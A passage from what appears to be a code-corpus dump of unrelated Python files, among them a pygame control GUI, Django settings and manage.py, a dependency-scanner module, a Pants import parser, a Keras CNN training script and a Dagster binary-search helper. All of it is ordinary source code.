pygame.draw.circle(window_surface, RED, (180, 480), radius/2)
elif pos3set and not pos3run and atPos3:
pygame.draw.circle(window_surface, GREEN, (180, 480), radius/2)
elif pos3set and pos3run and not atPos3:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (180, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (180, 480), radius/2)
elif not pos3set:
pygame.draw.circle(window_surface, OFF, (180, 480), radius/2)
if pos4set and not pos4run and not atPos4:
pygame.draw.circle(window_surface, RED, (240, 480), radius/2)
elif pos4set and not pos4run and atPos4:
pygame.draw.circle(window_surface, GREEN, (240, 480), radius/2)
elif pos4set and pos4run and not atPos4:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (240, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (240, 480), radius/2)
elif not pos4set:
pygame.draw.circle(window_surface, OFF, (240, 480), radius/2)
if pos5set and not pos5run and not atPos5:
pygame.draw.circle(window_surface, RED, (300, 480), radius/2)
elif pos5set and not pos5run and atPos5:
pygame.draw.circle(window_surface, GREEN, (300, 480), radius/2)
elif pos5set and pos5run and not atPos5:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (300, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (300, 480), radius/2)
elif not pos5set:
pygame.draw.circle(window_surface, OFF, (300, 480), radius/2)
if pos6set and not pos6run and not atPos6:
pygame.draw.circle(window_surface, RED, (360, 480), radius/2)
elif pos6set and not pos6run and atPos6:
pygame.draw.circle(window_surface, GREEN, (360, 480), radius/2)
elif pos6set and pos6run and not atPos6:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (360, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (360, 480), radius/2)
elif not pos6set:
pygame.draw.circle(window_surface, OFF, (360, 480), radius/2)
# Blink timer for position LEDs
if previousTicks <= pygame.time.get_ticks():
blinkSet = not blinkSet
previousTicks = pygame.time.get_ticks() + interval
# Only enable sending of Report after delay
if canSendReport and (previousTicksReport <= pygame.time.get_ticks()):
canSendReport = False
temp='^r'
sendSerial(temp)
# Speed LEDs
if speedRec and speedIsFast:
pygame.draw.circle(window_surface, GREEN, (460, 130), radius/2)
elif speedRec and not speedIsFast:
pygame.draw.circle(window_surface, GREEN, (460, 190), radius/2)
ui_manager.draw_ui(window_surface) # draw UI
# Draw W A S D Letters
window_surface.blit(textsurfaceW,(198,28)) # W
window_surface.blit(textsurfaceA,(35,190)) # A
window_surface.blit(textsurfaceS,(205,355)) # S
window_surface.blit(textsurfaceD,(365,190)) # D
window_surface.blit(textsurfaceLeft,(35,415)) # ,
window_surface.blit(textsurfaceRight,(375,415)) # .
axisXDOT = scale(axisX, (-255,255), (-1.0,1.0))
axisYDOT = scale(axisY, (-255,255), (-1.0,1.0))
axisZDOT = scale(axisZ, (-255,255), (-1.0,1.0))
axisTestDot = pygame.math.Vector2((axisXDOT*10), (axisYDOT*10))
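    # Descriptive note: the sqrt(1 - 0.5 * other_axis**2) factors below are the standard
    # square-to-disc ("elliptical grid") mapping, which keeps the drawn dot inside the
    # circular joystick area even when both axes are at full deflection.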
xCircle = axisXDOT * math.sqrt(1 - 0.5*axisYDOT**2)
yCircle = axisYDOT * math.sqrt(1 - 0.5*axisXDOT**2)
#joyCircle.x = (axisXDOT*165)+210-radius
#joyCircle.y = (axisYDOT*165)+210-radius
sliderCircle.x = (axisZDOT*165)+210-radius
joyCircle.x = (xCircle*165)+210-radius
joyCircle.y = (yCircle*165)+210-radius
# Draw draggable red dots
#pygame.draw.circle(window_surface, RED, (joyCircle.x+radius,joyCircle.y+radius), radius)
pygame.draw.circle(window_surface, RED, (axisTestDot), radius)
pygame.draw.circle(window_surface, RED, (sliderCircle.x+radius,430), radius)
# TEST
#pygame.draw.circle(window_surface, GREEN, (axisX+radius,axisY+radius), radius)
# Draw boxes that bound red dots
#pygame.draw.rect(window_surface, [125,0,0], [30,30,360,360],width=3)
pygame.draw.rect(window_surface, [125,0,0], [30,400,360,60],width=3)
pygame.draw.circle(window_surface, [125,0,0], (210,210),180+(radius/2),width=3)
mouse = pygame.mouse.get_pos()
# Zoom In & Out button highlights
if 482 <= mouse[0] <= 482+56 and 262 <= mouse[1] <= 262+56:
pygame.draw.rect(window_surface,colour_light,[482,262,56,56])
else:
pygame.draw.rect(window_surface,colour_dark,[482,262,56,56])
if 482 <= mouse[0] <= 482+56 and 322 <= mouse[1] <= 322+56:
pygame.draw.rect(window_surface,colour_light,[482,322,56,56])
else:
pygame.draw.rect(window_surface,colour_dark,[482,322,56,56])
# Display Zoom In & Zoom Out text inside their buttons
window_surface.blit(zoomINtext, (500, 278))
window_surface.blit(zoomOUTtext, (491, 338))
pygame.display.update()
clk.tick(40) |
py | 1a40cbf50a31781c92204348b434ec0374b4cc2f | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test312_1.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 1a40ccaf4d581eda75eba2c23c00af1811b2ed59 | from IPython.parallel import Client
from random import uniform
from simul import Particle
def scatter_gather(nparticles):
particles = [Particle(uniform(-1.0, 1.0),
uniform(-1.0, 1.0),
uniform(-1.0, 1.0)) for i in range(nparticles)]
rc = Client()
dview = rc[:]
dview.scatter('particle_chunk', particles).get()
dview.execute('from simul import ParticleSimulator')
dview.execute('simulator = ParticleSimulator(particle_chunk)')
dview.execute('simulator.evolve_cython(0.1)')
particles = dview.gather('particle_chunk', block=True)
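# Illustrative usage note (assumption, not in the original file): Client() attaches to an
# already-running IPython cluster, e.g. one started with `ipcluster start -n 4`, and the
# `simul` module providing Particle/ParticleSimulator must be importable on every engine.
#   scatter_gather(1024)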
|
py | 1a40ccbe7601bfd0716a5c617a309b1c988d1f70 | #!/usr/bin/python3
# coding=utf-8
# pylint: disable=I0011,E0401,W0702,W0703
# Copyright 2019 getcarrier.io
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Scanner: safety
"""
import os
import subprocess
from dusty.tools import log
from dusty.models.module import DependentModuleModel
from dusty.models.scanner import ScannerModel
from .parser import parse_findings
class Scanner(DependentModuleModel, ScannerModel):
""" Scanner class """
def __init__(self, context):
""" Initialize scanner instance """
super().__init__()
self.context = context
self.config = \
self.context.config["scanners"][__name__.split(".")[-3]][__name__.split(".")[-2]]
def execute(self):
""" Run the scanner """
targets = self.config.get("requirements", "requirements.txt")
if isinstance(targets, str):
targets = [targets]
options = list()
for target in targets:
options.append("-r")
options.append(target)
task = subprocess.run(
["safety", "check", "--json"] + options,
stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
log.log_subprocess_result(task)
parse_findings(task.stdout.decode("utf-8", errors="ignore"), self)
# Save intermediates
self.save_intermediates(task.stdout)
def save_intermediates(self, task_stdout):
""" Save scanner intermediates """
if self.config.get("save_intermediates_to", None):
log.info("Saving intermediates")
base = os.path.join(self.config.get("save_intermediates_to"), __name__.split(".")[-2])
try:
# Make directory for artifacts
os.makedirs(base, mode=0o755, exist_ok=True)
# Save report
with open(os.path.join(base, "report.json"), "w") as report:
report.write(task_stdout.decode("utf-8", errors="ignore"))
except:
log.exception("Failed to save intermediates")
@staticmethod
def fill_config(data_obj):
""" Make sample config """
data_obj.insert(
len(data_obj), "requirements", "requirements.txt",
comment="path to requirements.txt (string or list of strings)"
)
data_obj.insert(
len(data_obj), "save_intermediates_to", "/data/intermediates/dast",
comment="(optional) Save scan intermediates (raw results, logs, ...)"
)
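        # Illustrative sketch of the resulting scanner section (assumption -- the
        # surrounding config layout is defined elsewhere in dusty):
        #   safety:
        #     requirements: requirements.txt
        #     save_intermediates_to: /data/intermediates/dast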
@staticmethod
def validate_config(config):
""" Validate config """
required = []
not_set = [item for item in required if item not in config]
if not_set:
error = f"Required configuration options not set: {', '.join(not_set)}"
log.error(error)
raise ValueError(error)
@staticmethod
def get_name():
""" Module name """
return "safety"
@staticmethod
def get_description():
""" Module description or help message """
return "Python dependency analyzer"
|
py | 1a40ccd5bc2dcd45294c1977b646714d355892b0 | # -*- coding: utf-8 -*- #
# Copyright 2013 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""config command group."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA,
base.ReleaseTrack.GA)
class Config(base.Group):
"""View and edit Cloud SDK properties.
The {command} command group lets you set, view and unset properties used by
Cloud SDK.
A configuration is a set of properties that govern the behavior of `gcloud`
and other Cloud SDK tools. The initial `default` configuration is set when
`gcloud init` is run. You can create additional named configurations using
`gcloud init` or `{command} configurations create`.
To display the path of the active configuration along with information
about the current `gcloud` environment, run $ gcloud info.
To switch between configurations, use `{command} configurations activate`.
gcloud supports several flags that have the same effect as properties in
a configuration (for example, gcloud supports both the `--project` flag and
`project` property). Properties differ from flags in that flags affect command
behavior on a per-invocation basis. Properties allow you to maintain the same
settings across command executions.
For more information on configurations, see `gcloud topic configurations`.
## AVAILABLE PROPERTIES
{properties}
"""
category = base.SDK_TOOLS_CATEGORY
detailed_help = {
'properties': properties.VALUES.GetHelpString(),
}
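  # Illustrative usage of this command group (not part of this module):
  #   $ gcloud config set project my-project
  #   $ gcloud config list
  #   $ gcloud config configurations activate my-config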
|
py | 1a40cd63acb6707162eefba40c4e30c6a71971b9 | import json
def get_config():
"""
Return credentials.
Either monkey patch this, or write a configuration file for it to read.
"""
# Yola's internal configuration system:
try:
from yoconfig import get_config
return get_config('cloudflare')
except ImportError:
pass
with open('configuration.json') as f:
return json.load(f)['common']['cloudflare']
|
py | 1a40ce809dfa0a777e1df4eaca14f7e5c9870564 | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import ast as ast3
import re
import sys
from dataclasses import dataclass
from typing import Optional, Set, Tuple
from typed_ast import ast27
from pants.util.memo import memoized_property
from pants.util.ordered_set import FrozenOrderedSet
from pants.util.strutil import ensure_text
class ImportParseError(ValueError):
pass
@dataclass(frozen=True)
class ParsedPythonImports:
"""All the discovered imports from a Python source file.
Explicit imports are imports from `import x` and `from module import x` statements. Inferred
imports come from strings that look like module names, such as
`importlib.import_module("example.subdir.Foo")`.
"""
explicit_imports: FrozenOrderedSet[str]
inferred_imports: FrozenOrderedSet[str]
@memoized_property
def all_imports(self) -> FrozenOrderedSet[str]:
return FrozenOrderedSet(sorted([*self.explicit_imports, *self.inferred_imports]))
def parse_file(source_code: str) -> Optional[Tuple]:
try:
# NB: The Python 3 ast is generally backwards-compatible with earlier versions. The only
        # breaking change is `async` and `await` becoming reserved keywords in Python 3.7 (deprecated
# in 3.6). If the std-lib fails to parse, we could use typed-ast to try parsing with a
# target version of Python 3.5, but we don't because Python 3.5 is almost EOL and has very
# low usage.
# We will also fail to parse Python 3.8 syntax if Pants is run with Python 3.6 or 3.7.
# There is no known workaround for this, beyond users changing their `./pants` script to
# always use >= 3.8.
tree = ast3.parse(source_code)
visitor_cls = _Py3AstVisitor if sys.version_info[:2] < (3, 8) else _Py38AstVisitor
return tree, visitor_cls
except SyntaxError:
try:
return ast27.parse(source_code), _Py27AstVisitor
except SyntaxError:
return None
def find_python_imports(source_code: str, *, module_name: str) -> ParsedPythonImports:
parse_result = parse_file(source_code)
# If there were syntax errors, gracefully early return. This is more user friendly than
# propagating the exception. Dependency inference simply won't be used for that file, and
# it'll be up to the tool actually being run (e.g. Pytest or Flake8) to error.
if parse_result is None:
return ParsedPythonImports(FrozenOrderedSet(), FrozenOrderedSet())
tree, ast_visitor_cls = parse_result
ast_visitor = ast_visitor_cls(module_name)
ast_visitor.visit(tree)
return ParsedPythonImports(
explicit_imports=FrozenOrderedSet(sorted(ast_visitor.explicit_imports)),
inferred_imports=FrozenOrderedSet(sorted(ast_visitor.inferred_imports)),
)
# This regex is used to infer imports from strings, e.g.
# `importlib.import_module("example.subdir.Foo")`.
_INFERRED_IMPORT_REGEX = re.compile(r"^([a-z_][a-z_\d]*\.){2,}[a-zA-Z_]\w*$")
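# Illustrative note (not part of the original module): the pattern requires at least three
# dot-separated parts, with every part before the last a lowercase (or underscore-led) identifier:
#   _INFERRED_IMPORT_REGEX.match("example.subdir.Foo")  # matches
#   _INFERRED_IMPORT_REGEX.match("os.path")             # no match (only two parts)
#   _INFERRED_IMPORT_REGEX.match("Not.a.module")        # no match (uppercase first part)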
class _BaseAstVisitor:
def __init__(self, module_name: str) -> None:
self._module_parts = module_name.split(".")
self.explicit_imports: Set[str] = set()
self.inferred_imports: Set[str] = set()
def maybe_add_inferred_import(self, s: str) -> None:
if _INFERRED_IMPORT_REGEX.match(s):
self.inferred_imports.add(s)
def visit_Import(self, node) -> None:
for alias in node.names:
self.explicit_imports.add(alias.name)
def visit_ImportFrom(self, node) -> None:
rel_module = node.module
abs_module = ".".join(
self._module_parts[0 : -node.level] + ([] if rel_module is None else [rel_module])
)
for alias in node.names:
self.explicit_imports.add(f"{abs_module}.{alias.name}")
class _Py27AstVisitor(ast27.NodeVisitor, _BaseAstVisitor):
def visit_Str(self, node) -> None:
val = ensure_text(node.s)
self.maybe_add_inferred_import(val)
class _Py3AstVisitor(ast3.NodeVisitor, _BaseAstVisitor):
def visit_Str(self, node) -> None:
self.maybe_add_inferred_import(node.s)
class _Py38AstVisitor(ast3.NodeVisitor, _BaseAstVisitor):
# Python 3.8 deprecated the Str node in favor of Constant.
def visit_Constant(self, node) -> None:
if isinstance(node.value, str):
self.maybe_add_inferred_import(node.value)
|
py | 1a40cf3f7edd5fa7bf4e104c01201ff3279b49c5 | from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["example.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_DEFAULT_ACL = None
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# STATIC
# ------------------------
STATICFILES_STORAGE = "config.settings.production.StaticRootS3Boto3Storage"
STATIC_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/static/"
# MEDIA
# ------------------------------------------------------------------------------
# region http://stackoverflow.com/questions/10390244/
# Full-fledge class: https://stackoverflow.com/a/18046120/104731
from storages.backends.s3boto3 import S3Boto3Storage # noqa E402
class StaticRootS3Boto3Storage(S3Boto3Storage):
location = "static"
class MediaRootS3Boto3Storage(S3Boto3Storage):
location = "media"
file_overwrite = False
# endregion
DEFAULT_FILE_STORAGE = "config.settings.production.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com/media/"
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES[0]["OPTIONS"]["loaders"] = [ # noqa F405
(
"django.template.loaders.cached.Loader",
[
"django.template.loaders.filesystem.Loader",
"django.template.loaders.app_directories.Loader",
],
)
]
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL", default="OSchool <[email protected]>"
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
"DJANGO_EMAIL_SUBJECT_PREFIX", default="[OSchool]"
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail (Mailgun)
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
}
# Gunicorn
# ------------------------------------------------------------------------------
INSTALLED_APPS += ["gunicorn"] # noqa F405
# Collectfast
# ------------------------------------------------------------------------------
# https://github.com/antonagestam/collectfast#installation
INSTALLED_APPS = ["collectfast"] + INSTALLED_APPS # noqa F405
AWS_PRELOAD_METADATA = True
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}},
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"mail_admins": {
"level": "ERROR",
"filters": ["require_debug_false"],
"class": "django.utils.log.AdminEmailHandler",
},
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
},
},
"loggers": {
"django.request": {
"handlers": ["mail_admins"],
"level": "ERROR",
"propagate": True,
},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console", "mail_admins"],
"propagate": True,
},
},
}
# Your stuff...
# ------------------------------------------------------------------------------
|
py | 1a40cf558e1098312d27ef9ac9f97df5dd54e535 | #Import required libraries
import os
import cv2
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from random import shuffle
from tensorflow import keras
import matplotlib.pyplot as plt
from tensorflow.keras import models, layers
#Github: https://github.com/sujitmandal
#This program was created by Sujit Mandal
"""
Github: https://github.com/sujitmandal
This program was created by Sujit Mandal
LinkedIn : https://www.linkedin.com/in/sujit-mandal-91215013a/
Facebook : https://www.facebook.com/sujit.mandal.33671748
Twitter : https://twitter.com/mandalsujit37
"""
#Read The Dataset
train_images = np.load('Dataset/64/train_images.npy')
train_labels = np.load('Dataset/64/train_labels.npy')
test_images = np.load('Dataset/64/test_images.npy')
test_labels = np.load('Dataset/64/test_labels.npy')
#Normalized
train_images = train_images / 255.0
test_images = test_images / 255.0
image_size = 64
#image_size = int(input('Enter The Image Size [32, 64, 128] :'))
EPOCHS = 20
#Convolutional Neural Network(CNN) building
def build_model():
model = models.Sequential()
model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(image_size, image_size, 3)))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.MaxPooling2D((2, 2)))
model.add(layers.Conv2D(64, (3, 3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10))
model.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
return model
model = build_model()
ch_path = ('save/64/cp.ckpt')
cp_dir = os.path.dirname(ch_path)
cp_callback = tf.keras.callbacks.ModelCheckpoint(ch_path,
save_weights_only = True,
verbose = 1)
model = build_model()
#Train the model
history = model.fit(train_images, train_labels, epochs=EPOCHS,
validation_data=(test_images, test_labels), callbacks = [cp_callback])
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label = 'val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
plt.show()
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('Accuracy: {:5.2f}%'.format(100*test_acc))
model = build_model()
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
model.load_weights(ch_path)
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
ch_path_2 = ('save/64/cp-{epoch:04d}.ckpt')
cp_dir_2 = os.path.dirname(ch_path_2)
cp_callback_2 = tf.keras.callbacks.ModelCheckpoint(ch_path_2,
save_weights_only = True,
verbose = 1,
period = 5)
model = build_model()
#Train the model
history_2 = model.fit(train_images, train_labels,
epochs=EPOCHS,
validation_data=(test_images, test_labels),
callbacks = [cp_callback_2],
verbose = 0
)
latest_model = tf.train.latest_checkpoint(cp_dir_2)
#save
model.save_weights('./save/64/my_save')
#restore
model = build_model()
model.load_weights('./save/64/my_save')
loss, acc = model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
model = build_model()
model.fit(train_images, train_labels, epochs=15)
#save entire model to a HDF5 file
model.save('saved model/64/my_model.h5')
new_model = keras.models.load_model('saved model/64/my_model.h5')
new_model.summary()
loss, acc = new_model.evaluate(test_images, test_labels)
print('restored model, accuracy: {:5.2f}%'.format(100*acc))
plt.plot(history.history['accuracy'], label='accuracy')
plt.plot(history.history['val_accuracy'], label = 'val_accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.ylim([0.5, 1])
plt.legend(loc='lower right')
plt.show()
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print('Final Model, accuracy: {:5.2f}%'.format(100*test_acc)) |
py | 1a40cfa0f1ab8260b5c2e1eef9e4d7866c978e1d | # Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = "0.13dev0"
|
py | 1a40d114b136f3932ce64ce548e8b443cd0bfb7e | from django.apps import AppConfig
class ShopAppConfig(AppConfig):
name = "my_online_shop.shop"
default_auto_field = "django.db.models.BigAutoField"
|
py | 1a40d129176f6893c9307331af8e478ec6688756 | from keras.models import model_from_json
from common import *
def save_model(json_file, weights_file, model):
with open(json_file, 'w') as model_file:
model_file.write(model.to_json())
model.save_weights(weights_file)
def load_model(json_file, weights_file):
with open(json_file, 'r') as jfile:
model = model_from_json(jfile.read())
model.load_weights(weights_file)
return model
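# Illustrative usage sketch (assumption -- the file names are hypothetical):
#   model = load_model('model.json', 'model.h5')     # rebuild architecture, then load weights
#   save_model('model.json', 'model.h5', model)      # write architecture and weights separately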
def load_base_model(cut_index):
return load_model(
base_model_stem(cut_index) + '.json',
base_model_stem(cut_index) + '.h5')
|
py | 1a40d20e6be8b6e071b5b997c2033f8ab847b6ff | from typing import Optional
from enum import Enum
from pydantic import BaseModel
class messageEnum(str, Enum):
updated = "updated"
class ResponseMessageSchema(BaseModel):
message: messageEnum
details: Optional[str] = None
|
py | 1a40d20e7662b397f9b3465ed8f80a59049cf539 | from datetime import datetime, timezone
from typing import Tuple
from dagster import EventMetadataEntry, Output, OutputDefinition, solid
def binary_search_nearest_left(get_value, start, end, min_target):
mid = (start + end) // 2
while start <= end:
mid = (start + end) // 2
mid_timestamp = get_value(mid)
if mid_timestamp == min_target:
return mid
elif mid_timestamp < min_target:
start = mid + 1
elif mid_timestamp > min_target:
end = mid - 1
if mid == end:
return end + 1
return start
def binary_search_nearest_right(get_value, start, end, max_target):
mid = (start + end) // 2
while start <= end:
mid = (start + end) // 2
mid_timestamp = get_value(mid)
if not mid_timestamp:
end = end - 1
if mid_timestamp == max_target:
return mid
elif mid_timestamp < max_target:
start = mid + 1
elif mid_timestamp > max_target:
end = mid - 1
if end == -1:
return None
if start > end:
return end
return end
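# Illustrative sketch (not part of the original module): both helpers assume `get_value`
# is non-decreasing over the id range.  With ts = [10, 20, 30, 40, 50]:
#   binary_search_nearest_left(ts.__getitem__, 0, 4, 25)   # -> 2, first index with value >= 25
#   binary_search_nearest_right(ts.__getitem__, 0, 4, 25)  # -> 1, last index with value <= 25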
def _id_range_for_time(start, end, hn_client):
start = datetime.timestamp(
datetime.strptime(start, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
)
end = datetime.timestamp(
datetime.strptime(end, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
)
def _get_item_timestamp(item_id):
item = hn_client.fetch_item_by_id(item_id)
return item["time"]
max_item_id = hn_client.fetch_max_item_id()
# declared by resource to allow testability against snapshot
min_item_id = hn_client.min_item_id()
start_id = binary_search_nearest_left(_get_item_timestamp, min_item_id, max_item_id, start)
end_id = binary_search_nearest_right(_get_item_timestamp, min_item_id, max_item_id, end)
start_timestamp = str(datetime.fromtimestamp(_get_item_timestamp(start_id), tz=timezone.utc))
end_timestamp = str(datetime.fromtimestamp(_get_item_timestamp(end_id), tz=timezone.utc))
metadata_entries = [
EventMetadataEntry.int(value=max_item_id, label="max_item_id"),
EventMetadataEntry.int(value=start_id, label="start_id"),
EventMetadataEntry.int(value=end_id, label="end_id"),
EventMetadataEntry.int(value=end_id - start_id, label="items"),
EventMetadataEntry.text(text=start_timestamp, label="start_timestamp"),
EventMetadataEntry.text(text=end_timestamp, label="end_timestamp"),
]
id_range = (start_id, end_id)
return id_range, metadata_entries
@solid(
required_resource_keys={"hn_client", "partition_start", "partition_end"},
output_defs=[
OutputDefinition(
Tuple[int, int],
